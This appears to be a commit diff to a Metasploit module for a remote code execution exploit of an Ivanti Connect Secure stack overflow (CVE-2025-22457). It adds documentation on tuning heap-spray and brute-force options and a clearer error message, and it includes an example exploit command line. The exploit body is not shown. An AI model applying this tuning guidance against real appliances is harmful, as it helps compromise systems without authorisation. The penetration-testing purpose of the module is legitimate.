Update the error message in case of Broken pipe error and update the documentation

Author: cdelafuente-r7

documentation/modules/exploit/linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457.md

@@ -41,6 +41,18 @@ The number of `/home/bin/web` child processes the server uses. It's been
 observed that the number of children the main process forks is directly related
 to the number of vCPUs used by the system. Ivanti recommends having 4 vCPUs, so
 the default number of children is set to 4.
+Note that this option should be set properly, since the exploit needs to send enough
+spray patterns to fill the memory of each child process. This is mandatory,
+since we don’t control which child process will be used to trigger the
+vulnerability. If we send too much data, the process memory will overflow and
+the process will crash. A `Broken pipe` socket error will happen in this case.
+So, if the number of `WEB_CHILDREN` is too low (< vCPUs), we might not send
+enough data to fill the memory of every child process and the exploit would
+likely fail. This scenario cannot be detected since the child processes should
+not crash. The module will simply continue to brute force with a different base
+address of `libdsplibs`, without detecting the real issue. On the other hand,
+if we send too much data, the child processes will crash and we will need to
+start everything again with a lower `WEB_CHILDREN` value.
 
 ### LIBDSPLIBS_ADDRESS
 The base address of libdsplibs that the module will start with when brute
@@ -57,7 +69,7 @@ The number of attempts to brute force the base address of libdsplibs (default: 2
 
 ### Ivanti Connect Secure version 22.7r2.4 b3597
 
-In this example, the address of libdsplibs is known to speed up the process (0xf64c1000). Also, we know the target system runs with 2 vCPU's.
+In this example, the address of libdsplibs is known to speed up the process (0xf64c1000). Also, we know the target system runs with 2 vCPUs.
 
 ```
 msf6 exploit(linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457) > exploit verbose=true lhost=192.168.222.97 rhosts=192.168.222.222 libdsplibs_address=0xf64c1000 web_children=2

modules/exploits/linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457.rb

@@ -75,7 +75,7 @@ def initialize(info = {})
       )
     )
 
-    register_advanced_options(
+    register_options(
       [
         OptInt.new('MAX_THREADS', [true, 'Max threads to use when spraying', 32]),
         OptInt.new('WEB_CHILDREN', [true, 'The number of /home/bin/web child processes', 4]),
@@ -301,7 +301,10 @@ def spray(libdsplibs_base)
 
           s.write(ift_body)
         rescue Errno::EMFILE, Errno::ECONNRESET, Errno::EPIPE => e
-          print_error("Error while writing the socket (you might have a too high WEB_CHILDREN value): #{e}")
+          print_error("Error while writing the socket: #{e}")
+          print_error('This is likely because the `WEB_CHILDREN` option is too high and one of the'\
+                      'web child crashed. This needs to match the number of vCPUs of the target, '\
+                      'since the number of child process matched the number of vCPUs.')
         end
       end
     end